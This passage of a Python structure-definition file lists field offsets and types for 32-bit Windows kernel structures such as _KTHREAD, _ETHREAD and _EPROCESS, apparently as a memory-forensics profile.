'NpxState' : [ 0x69, ['unsigned char']],
'WaitIrql' : [ 0x6a, ['unsigned char']],
'WaitMode' : [ 0x6b, ['unsigned char']],
'WaitStatus' : [ 0x6c, ['long']],
'WaitBlockList' : [ 0x70, ['pointer', ['_KWAIT_BLOCK']]],
'WaitListEntry' : [ 0x74, ['_LIST_ENTRY']],
'SwapListEntry' : [ 0x74, ['_SINGLE_LIST_ENTRY']],
'Queue' : [ 0x7c, ['pointer', ['_KQUEUE']]],
'WaitTime' : [ 0x80, ['unsigned long']],
'KernelApcDisable' : [ 0x84, ['short']],
'SpecialApcDisable' : [ 0x86, ['short']],
'CombinedApcDisable' : [ 0x84, ['unsigned long']],
'Teb' : [ 0x88, ['pointer', ['void']]],
'Timer' : [ 0x90, ['_KTIMER']],
'AutoAlignment' : [ 0xb8, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DisableBoost' : [ 0xb8, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'EtwStackTraceApc1Inserted' : [ 0xb8, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'EtwStackTraceApc2Inserted' : [ 0xb8, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CalloutActive' : [ 0xb8, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'ApcQueueable' : [ 0xb8, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'EnableStackSwap' : [ 0xb8, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'GuiThread' : [ 0xb8, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'UmsPerformingSyscall' : [ 0xb8, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'ReservedFlags' : [ 0xb8, ['BitField', dict(start_bit = 9, end_bit = 32, native_type='unsigned long')]],
'ThreadFlags' : [ 0xb8, ['long']],
'ServiceTable' : [ 0xbc, ['pointer', ['void']]],
'WaitBlock' : [ 0xc0, ['array', 4, ['_KWAIT_BLOCK']]],
'QueueListEntry' : [ 0x120, ['_LIST_ENTRY']],
'TrapFrame' : [ 0x128, ['pointer', ['_KTRAP_FRAME']]],
'FirstArgument' : [ 0x12c, ['pointer', ['void']]],
'CallbackStack' : [ 0x130, ['pointer', ['void']]],
'CallbackDepth' : [ 0x130, ['unsigned long']],
'ApcStateIndex' : [ 0x134, ['unsigned char']],
'BasePriority' : [ 0x135, ['unsigned char']],
'PriorityDecrement' : [ 0x136, ['unsigned char']],
'ForegroundBoost' : [ 0x136, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned char')]],
'UnusualBoost' : [ 0x136, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'Preempted' : [ 0x137, ['unsigned char']],
'AdjustReason' : [ 0x138, ['unsigned char']],
'AdjustIncrement' : [ 0x139, ['unsigned char']],
'PreviousMode' : [ 0x13a, ['unsigned char']],
'Saturation' : [ 0x13b, ['unsigned char']],
'SystemCallNumber' : [ 0x13c, ['unsigned long']],
'FreezeCount' : [ 0x140, ['unsigned long']],
'UserAffinity' : [ 0x144, ['_GROUP_AFFINITY']],
'Process' : [ 0x150, ['pointer', ['_KPROCESS']]],
'Affinity' : [ 0x154, ['_GROUP_AFFINITY']],
'IdealProcessor' : [ 0x160, ['unsigned long']],
'UserIdealProcessor' : [ 0x164, ['unsigned long']],
'ApcStatePointer' : [ 0x168, ['array', 2, ['pointer', ['_KAPC_STATE']]]],
'SavedApcState' : [ 0x170, ['_KAPC_STATE']],
'SavedApcStateFill' : [ 0x170, ['array', 23, ['unsigned char']]],
'WaitReason' : [ 0x187, ['unsigned char']],
'SuspendCount' : [ 0x188, ['unsigned char']],
'Spare1' : [ 0x189, ['unsigned char']],
'OtherPlatformFill' : [ 0x18a, ['unsigned char']],
'Win32Thread' : [ 0x18c, ['pointer', ['void']]],
'StackBase' : [ 0x190, ['pointer', ['void']]],
'SuspendApc' : [ 0x194, ['_KAPC']],
'SuspendApcFill0' : [ 0x194, ['array', 1, ['unsigned char']]],
'ResourceIndex' : [ 0x195, ['unsigned char']],
'SuspendApcFill1' : [ 0x194, ['array', 3, ['unsigned char']]],
'QuantumReset' : [ 0x197, ['unsigned char']],
'SuspendApcFill2' : [ 0x194, ['array', 4, ['unsigned char']]],
'KernelTime' : [ 0x198, ['unsigned long']],
'SuspendApcFill3' : [ 0x194, ['array', 36, ['unsigned char']]],
'WaitPrcb' : [ 0x1b8, ['pointer', ['_KPRCB']]],
'SuspendApcFill4' : [ 0x194, ['array', 40, ['unsigned char']]],
'LegoData' : [ 0x1bc, ['pointer', ['void']]],
'SuspendApcFill5' : [ 0x194, ['array', 47, ['unsigned char']]],
'LargeStack' : [ 0x1c3, ['unsigned char']],
'UserTime' : [ 0x1c4, ['unsigned long']],
'SuspendSemaphore' : [ 0x1c8, ['_KSEMAPHORE']],
'SuspendSemaphorefill' : [ 0x1c8, ['array', 20, ['unsigned char']]],
'SListFaultCount' : [ 0x1dc, ['unsigned long']],
'ThreadListEntry' : [ 0x1e0, ['_LIST_ENTRY']],
'MutantListHead' : [ 0x1e8, ['_LIST_ENTRY']],
'SListFaultAddress' : [ 0x1f0, ['pointer', ['void']]],
'ThreadCounters' : [ 0x1f4, ['pointer', ['_KTHREAD_COUNTERS']]],
'XStateSave' : [ 0x1f8, ['pointer', ['_XSTATE_SAVE']]],
} ],
'_KSPIN_LOCK_QUEUE' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['_KSPIN_LOCK_QUEUE']]],
'Lock' : [ 0x4, ['pointer', ['unsigned long']]],
} ],
'_FAST_MUTEX' : [ 0x20, {
'Count' : [ 0x0, ['long']],
'Owner' : [ 0x4, ['pointer', ['_KTHREAD']]],
'Contention' : [ 0x8, ['unsigned long']],
'Event' : [ 0xc, ['_KEVENT']],
'OldIrql' : [ 0x1c, ['unsigned long']],
} ],
'_KEVENT' : [ 0x10, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
} ],
'_SLIST_HEADER' : [ 0x8, {
'Alignment' : [ 0x0, ['unsigned long long']],
'Next' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Depth' : [ 0x4, ['unsigned short']],
'Sequence' : [ 0x6, ['unsigned short']],
} ],
'_LOOKASIDE_LIST_EX' : [ 0x48, {
'L' : [ 0x0, ['_GENERAL_LOOKASIDE_POOL']],
} ],
'_NPAGED_LOOKASIDE_LIST' : [ 0xc0, {
'L' : [ 0x0, ['_GENERAL_LOOKASIDE']],
'Lock__ObsoleteButDoNotDelete' : [ 0x80, ['unsigned long']],
} ],
'_PAGED_LOOKASIDE_LIST' : [ 0xc0, {
'L' : [ 0x0, ['_GENERAL_LOOKASIDE']],
'Lock__ObsoleteButDoNotDelete' : [ 0x80, ['_FAST_MUTEX']],
} ],
'_QUAD' : [ 0x8, {
'UseThisFieldToCopy' : [ 0x0, ['long long']],
'DoNotUseThisField' : [ 0x0, ['double']],
} ],
'_IO_STATUS_BLOCK' : [ 0x8, {
'Status' : [ 0x0, ['long']],
'Pointer' : [ 0x0, ['pointer', ['void']]],
'Information' : [ 0x4, ['unsigned long']],
} ],
'_EX_PUSH_LOCK' : [ 0x4, {
'Locked' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Waiting' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Waking' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'MultipleShared' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Shared' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
'Value' : [ 0x0, ['unsigned long']],
'Ptr' : [ 0x0, ['pointer', ['void']]],
} ],
'_PROCESSOR_NUMBER' : [ 0x4, {
'Group' : [ 0x0, ['unsigned short']],
'Number' : [ 0x2, ['unsigned char']],
'Reserved' : [ 0x3, ['unsigned char']],
} ],
'_EX_PUSH_LOCK_CACHE_AWARE' : [ 0x80, {
'Locks' : [ 0x0, ['array', 32, ['pointer', ['_EX_PUSH_LOCK']]]],
} ],
'_PP_LOOKASIDE_LIST' : [ 0x8, {
'P' : [ 0x0, ['pointer', ['_GENERAL_LOOKASIDE']]],
'L' : [ 0x4, ['pointer', ['_GENERAL_LOOKASIDE']]],
} ],
'_GENERAL_LOOKASIDE' : [ 0x80, {
'ListHead' : [ 0x0, ['_SLIST_HEADER']],
'SingleListHead' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Depth' : [ 0x8, ['unsigned short']],
'MaximumDepth' : [ 0xa, ['unsigned short']],
'TotalAllocates' : [ 0xc, ['unsigned long']],
'AllocateMisses' : [ 0x10, ['unsigned long']],
'AllocateHits' : [ 0x10, ['unsigned long']],
'TotalFrees' : [ 0x14, ['unsigned long']],
'FreeMisses' : [ 0x18, ['unsigned long']],
'FreeHits' : [ 0x18, ['unsigned long']],
'Type' : [ 0x1c, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'Tag' : [ 0x20, ['unsigned long']],
'Size' : [ 0x24, ['unsigned long']],
'AllocateEx' : [ 0x28, ['pointer', ['void']]],
'Allocate' : [ 0x28, ['pointer', ['void']]],
'FreeEx' : [ 0x2c, ['pointer', ['void']]],
'Free' : [ 0x2c, ['pointer', ['void']]],
'ListEntry' : [ 0x30, ['_LIST_ENTRY']],
'LastTotalAllocates' : [ 0x38, ['unsigned long']],
'LastAllocateMisses' : [ 0x3c, ['unsigned long']],
'LastAllocateHits' : [ 0x3c, ['unsigned long']],
'Future' : [ 0x40, ['array', 2, ['unsigned long']]],
} ],
'_EX_FAST_REF' : [ 0x4, {
'Object' : [ 0x0, ['pointer', ['void']]],
'RefCnt' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'Value' : [ 0x0, ['unsigned long']],
} ],
'_EX_PUSH_LOCK_WAIT_BLOCK' : [ 0x30, {
'WakeEvent' : [ 0x0, ['_KEVENT']],
'Next' : [ 0x10, ['pointer', ['_EX_PUSH_LOCK_WAIT_BLOCK']]],
'Last' : [ 0x14, ['pointer', ['_EX_PUSH_LOCK_WAIT_BLOCK']]],
'Previous' : [ 0x18, ['pointer', ['_EX_PUSH_LOCK_WAIT_BLOCK']]],
'ShareCount' : [ 0x1c, ['long']],
'Flags' : [ 0x20, ['long']],
} ],
'_ETHREAD' : [ 0x2b8, {
'Tcb' : [ 0x0, ['_KTHREAD']],
'CreateTime' : [ 0x200, ['_LARGE_INTEGER']],
'ExitTime' : [ 0x208, ['_LARGE_INTEGER']],
'KeyedWaitChain' : [ 0x208, ['_LIST_ENTRY']],
'ExitStatus' : [ 0x210, ['long']],
'PostBlockList' : [ 0x214, ['_LIST_ENTRY']],
'ForwardLinkShadow' : [ 0x214, ['pointer', ['void']]],
'StartAddress' : [ 0x218, ['pointer', ['void']]],
'TerminationPort' : [ 0x21c, ['pointer', ['_TERMINATION_PORT']]],
'ReaperLink' : [ 0x21c, ['pointer', ['_ETHREAD']]],
'KeyedWaitValue' : [ 0x21c, ['pointer', ['void']]],
'ActiveTimerListLock' : [ 0x220, ['unsigned long']],
'ActiveTimerListHead' : [ 0x224, ['_LIST_ENTRY']],
'Cid' : [ 0x22c, ['_CLIENT_ID']],
'KeyedWaitSemaphore' : [ 0x234, ['_KSEMAPHORE']],
'AlpcWaitSemaphore' : [ 0x234, ['_KSEMAPHORE']],
'ClientSecurity' : [ 0x248, ['_PS_CLIENT_SECURITY_CONTEXT']],
'IrpList' : [ 0x24c, ['_LIST_ENTRY']],
'TopLevelIrp' : [ 0x254, ['unsigned long']],
'DeviceToVerify' : [ 0x258, ['pointer', ['_DEVICE_OBJECT']]],
'CpuQuotaApc' : [ 0x25c, ['pointer', ['_PSP_CPU_QUOTA_APC']]],
'Win32StartAddress' : [ 0x260, ['pointer', ['void']]],
'LegacyPowerObject' : [ 0x264, ['pointer', ['void']]],
'ThreadListEntry' : [ 0x268, ['_LIST_ENTRY']],
'RundownProtect' : [ 0x270, ['_EX_RUNDOWN_REF']],
'ThreadLock' : [ 0x274, ['_EX_PUSH_LOCK']],
'ReadClusterSize' : [ 0x278, ['unsigned long']],
'MmLockOrdering' : [ 0x27c, ['long']],
'CrossThreadFlags' : [ 0x280, ['unsigned long']],
'Terminated' : [ 0x280, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ThreadInserted' : [ 0x280, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'HideFromDebugger' : [ 0x280, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ActiveImpersonationInfo' : [ 0x280, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'SystemThread' : [ 0x280, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'HardErrorsAreDisabled' : [ 0x280, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'BreakOnTermination' : [ 0x280, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'SkipCreationMsg' : [ 0x280, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'SkipTerminationMsg' : [ 0x280, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'CopyTokenOnOpen' : [ 0x280, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'ThreadIoPriority' : [ 0x280, ['BitField', dict(start_bit = 10, end_bit = 13, native_type='unsigned long')]],
'ThreadPagePriority' : [ 0x280, ['BitField', dict(start_bit = 13, end_bit = 16, native_type='unsigned long')]],
'RundownFail' : [ 0x280, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'NeedsWorkingSetAging' : [ 0x280, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'SameThreadPassiveFlags' : [ 0x284, ['unsigned long']],
'ActiveExWorker' : [ 0x284, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ExWorkerCanWaitUser' : [ 0x284, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'MemoryMaker' : [ 0x284, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ClonedThread' : [ 0x284, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'KeyedEventInUse' : [ 0x284, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'RateApcState' : [ 0x284, ['BitField', dict(start_bit = 5, end_bit = 7, native_type='unsigned long')]],
'SelfTerminate' : [ 0x284, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'SameThreadApcFlags' : [ 0x288, ['unsigned long']],
'Spare' : [ 0x288, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'StartAddressInvalid' : [ 0x288, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'EtwPageFaultCalloutActive' : [ 0x288, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'OwnsProcessWorkingSetExclusive' : [ 0x288, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'OwnsProcessWorkingSetShared' : [ 0x288, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'OwnsSystemCacheWorkingSetExclusive' : [ 0x288, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'OwnsSystemCacheWorkingSetShared' : [ 0x288, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'OwnsSessionWorkingSetExclusive' : [ 0x288, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'OwnsSessionWorkingSetShared' : [ 0x289, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'OwnsProcessAddressSpaceExclusive' : [ 0x289, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'OwnsProcessAddressSpaceShared' : [ 0x289, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'SuppressSymbolLoad' : [ 0x289, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Prefetching' : [ 0x289, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'OwnsDynamicMemoryShared' : [ 0x289, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'OwnsChangeControlAreaExclusive' : [ 0x289, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'OwnsChangeControlAreaShared' : [ 0x289, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'OwnsPagedPoolWorkingSetExclusive' : [ 0x28a, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'OwnsPagedPoolWorkingSetShared' : [ 0x28a, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'OwnsSystemPtesWorkingSetExclusive' : [ 0x28a, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'OwnsSystemPtesWorkingSetShared' : [ 0x28a, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'TrimTrigger' : [ 0x28a, ['BitField', dict(start_bit = 4, end_bit = 6, native_type='unsigned char')]],
'Spare1' : [ 0x28a, ['BitField', dict(start_bit = 6, end_bit = 8, native_type='unsigned char')]],
'PriorityRegionActive' : [ 0x28b, ['unsigned char']],
'CacheManagerActive' : [ 0x28c, ['unsigned char']],
'DisablePageFaultClustering' : [ 0x28d, ['unsigned char']],
'ActiveFaultCount' : [ 0x28e, ['unsigned char']],
'LockOrderState' : [ 0x28f, ['unsigned char']],
'AlpcMessageId' : [ 0x290, ['unsigned long']],
'AlpcMessage' : [ 0x294, ['pointer', ['void']]],
'AlpcReceiveAttributeSet' : [ 0x294, ['unsigned long']],
'AlpcWaitListEntry' : [ 0x298, ['_LIST_ENTRY']],
'CacheManagerCount' : [ 0x2a0, ['unsigned long']],
'IoBoostCount' : [ 0x2a4, ['unsigned long']],
'IrpListLock' : [ 0x2a8, ['unsigned long']],
'ReservedForSynchTracking' : [ 0x2ac, ['pointer', ['void']]],
'CmCallbackListHead' : [ 0x2b0, ['_SINGLE_LIST_ENTRY']],
} ],
'_EPROCESS' : [ 0x2c0, {
'Pcb' : [ 0x0, ['_KPROCESS']],
'ProcessLock' : [ 0x98, ['_EX_PUSH_LOCK']],
'CreateTime' : [ 0xa0, ['_LARGE_INTEGER']],
'ExitTime' : [ 0xa8, ['_LARGE_INTEGER']],
'RundownProtect' : [ 0xb0, ['_EX_RUNDOWN_REF']],
'UniqueProcessId' : [ 0xb4, ['pointer', ['void']]],
'ActiveProcessLinks' : [ 0xb8, ['_LIST_ENTRY']],
'ProcessQuotaUsage' : [ 0xc0, ['array', 2, ['unsigned long']]],
'ProcessQuotaPeak' : [ 0xc8, ['array', 2, ['unsigned long']]],
'CommitCharge' : [ 0xd0, ['unsigned long']],
'QuotaBlock' : [ 0xd4, ['pointer', ['_EPROCESS_QUOTA_BLOCK']]],
'CpuQuotaBlock' : [ 0xd8, ['pointer', ['_PS_CPU_QUOTA_BLOCK']]],
'PeakVirtualSize' : [ 0xdc, ['unsigned long']],
'VirtualSize' : [ 0xe0, ['unsigned long']],
'SessionProcessLinks' : [ 0xe4, ['_LIST_ENTRY']],
'DebugPort' : [ 0xec, ['pointer', ['void']]],
'ExceptionPortData' : [ 0xf0, ['pointer', ['void']]],
'ExceptionPortValue' : [ 0xf0, ['unsigned long']],
'ExceptionPortState' : [ 0xf0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'ObjectTable' : [ 0xf4, ['pointer', ['_HANDLE_TABLE']]],
'Token' : [ 0xf8, ['_EX_FAST_REF']],
'WorkingSetPage' : [ 0xfc, ['unsigned long']],
'AddressCreationLock' : [ 0x100, ['_EX_PUSH_LOCK']],
'RotateInProgress' : [ 0x104, ['pointer', ['_ETHREAD']]],
'ForkInProgress' : [ 0x108, ['pointer', ['_ETHREAD']]],
'HardwareTrigger' : [ 0x10c, ['unsigned long']],
'PhysicalVadRoot' : [ 0x110, ['pointer', ['_MM_AVL_TABLE']]],
'CloneRoot' : [ 0x114, ['pointer', ['void']]],
'NumberOfPrivatePages' : [ 0x118, ['unsigned long']],
'NumberOfLockedPages' : [ 0x11c, ['unsigned long']],
'Win32Process' : [ 0x120, ['pointer', ['void']]],
'Job' : [ 0x124, ['pointer', ['_EJOB']]],
'SectionObject' : [ 0x128, ['pointer', ['void']]],
'SectionBaseAddress' : [ 0x12c, ['pointer', ['void']]],
'Cookie' : [ 0x130, ['unsigned long']],
'Spare8' : [ 0x134, ['unsigned long']],
'WorkingSetWatch' : [ 0x138, ['pointer', ['_PAGEFAULT_HISTORY']]],
'Win32WindowStation' : [ 0x13c, ['pointer', ['void']]],
'InheritedFromUniqueProcessId' : [ 0x140, ['pointer', ['void']]],
'LdtInformation' : [ 0x144, ['pointer', ['void']]],
'VdmObjects' : [ 0x148, ['pointer', ['void']]],
'ConsoleHostProcess' : [ 0x14c, ['unsigned long']],
'DeviceMap' : [ 0x150, ['pointer', ['void']]],
'EtwDataSource' : [ 0x154, ['pointer', ['void']]],
'FreeTebHint' : [ 0x158, ['pointer', ['void']]],
'PageDirectoryPte' : [ 0x160, ['_HARDWARE_PTE']],
'Filler' : [ 0x160, ['unsigned long long']],
'Session' : [ 0x168, ['pointer', ['void']]],
'ImageFileName' : [ 0x16c, ['array', 15, ['unsigned char']]],
'PriorityClass' : [ 0x17b, ['unsigned char']],
'JobLinks' : [ 0x17c, ['_LIST_ENTRY']],
'LockedPagesList' : [ 0x184, ['pointer', ['void']]],
'ThreadListHead' : [ 0x188, ['_LIST_ENTRY']],
'SecurityPort' : [ 0x190, ['pointer', ['void']]],
'PaeTop' : [ 0x194, ['pointer', ['void']]],
'ActiveThreads' : [ 0x198, ['unsigned long']],
'ImagePathHash' : [ 0x19c, ['unsigned long']],
'DefaultHardErrorProcessing' : [ 0x1a0, ['unsigned long']],
'LastThreadExitStatus' : [ 0x1a4, ['long']],
'Peb' : [ 0x1a8, ['pointer', ['_PEB']]],
'PrefetchTrace' : [ 0x1ac, ['_EX_FAST_REF']],
'ReadOperationCount' : [ 0x1b0, ['_LARGE_INTEGER']],
'WriteOperationCount' : [ 0x1b8, ['_LARGE_INTEGER']],
'OtherOperationCount' : [ 0x1c0, ['_LARGE_INTEGER']],
'ReadTransferCount' : [ 0x1c8, ['_LARGE_INTEGER']],
'WriteTransferCount' : [ 0x1d0, ['_LARGE_INTEGER']],
'OtherTransferCount' : [ 0x1d8, ['_LARGE_INTEGER']],
'CommitChargeLimit' : [ 0x1e0, ['unsigned long']],
'CommitChargePeak' : [ 0x1e4, ['unsigned long']],
'AweInfo' : [ 0x1e8, ['pointer', ['void']]],
'SeAuditProcessCreationInfo' : [ 0x1ec, ['_SE_AUDIT_PROCESS_CREATION_INFO']],
'Vm' : [ 0x1f0, ['_MMSUPPORT']],
'MmProcessLinks' : [ 0x25c, ['_LIST_ENTRY']],
'HighestUserAddress' : [ 0x264, ['pointer', ['void']]],
'ModifiedPageCount' : [ 0x268, ['unsigned long']],
'Flags2' : [ 0x26c, ['unsigned long']],
'JobNotReallyActive' : [ 0x26c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'AccountingFolded' : [ 0x26c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'NewProcessReported' : [ 0x26c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ExitProcessReported' : [ 0x26c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ReportCommitChanges' : [ 0x26c, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'LastReportMemory' : [ 0x26c, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'ReportPhysicalPageChanges' : [ 0x26c, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'HandleTableRundown' : [ 0x26c, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'NeedsHandleRundown' : [ 0x26c, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'RefTraceEnabled' : [ 0x26c, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'NumaAware' : [ 0x26c, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'ProtectedProcess' : [ 0x26c, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'DefaultPagePriority' : [ 0x26c, ['BitField', dict(start_bit = 12, end_bit = 15, native_type='unsigned long')]],
'PrimaryTokenFrozen' : [ 0x26c, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'ProcessVerifierTarget' : [ 0x26c, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'StackRandomizationDisabled' : [ 0x26c, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'AffinityPermanent' : [ 0x26c, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'AffinityUpdateEnable' : [ 0x26c, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'PropagateNode' : [ 0x26c, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'ExplicitAffinity' : [ 0x26c, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'Flags' : [ 0x270, ['unsigned long']],
'CreateReported' : [ 0x270, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'NoDebugInherit' : [ 0x270, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ProcessExiting' : [ 0x270, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ProcessDelete' : [ 0x270, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Wow64SplitPages' : [ 0x270, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'VmDeleted' : [ 0x270, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'OutswapEnabled' : [ 0x270, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Outswapped' : [ 0x270, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ForkFailed' : [ 0x270, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'Wow64VaSpace4Gb' : [ 0x270, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'AddressSpaceInitialized' : [ 0x270, ['BitField', dict(start_bit = 10, end_bit = 12, native_type='unsigned long')]],
'SetTimerResolution' : [ 0x270, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'BreakOnTermination' : [ 0x270, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'DeprioritizeViews' : [ 0x270, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'WriteWatch' : [ 0x270, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'ProcessInSession' : [ 0x270, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'OverrideAddressSpace' : [ 0x270, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'HasAddressSpace' : [ 0x270, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'LaunchPrefetched' : [ 0x270, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'InjectInpageErrors' : [ 0x270, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'VmTopDown' : [ 0x270, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'ImageNotifyDone' : [ 0x270, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'PdeUpdateNeeded' : [ 0x270, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'VdmAllowed' : [ 0x270, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long')]],
'CrossSessionCreate' : [ 0x270, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'ProcessInserted' : [ 0x270, ['BitField', dict(start_bit = 26, end_bit = 27, native_type='unsigned long')]],
'DefaultIoPriority' : [ 0x270, ['BitField', dict(start_bit = 27, end_bit = 30, native_type='unsigned long')]],
'ProcessSelfDelete' : [ 0x270, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'SetTimerResolutionLink' : [ 0x270, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
'ExitStatus' : [ 0x274, ['long']],
'VadRoot' : [ 0x278, ['_MM_AVL_TABLE']],
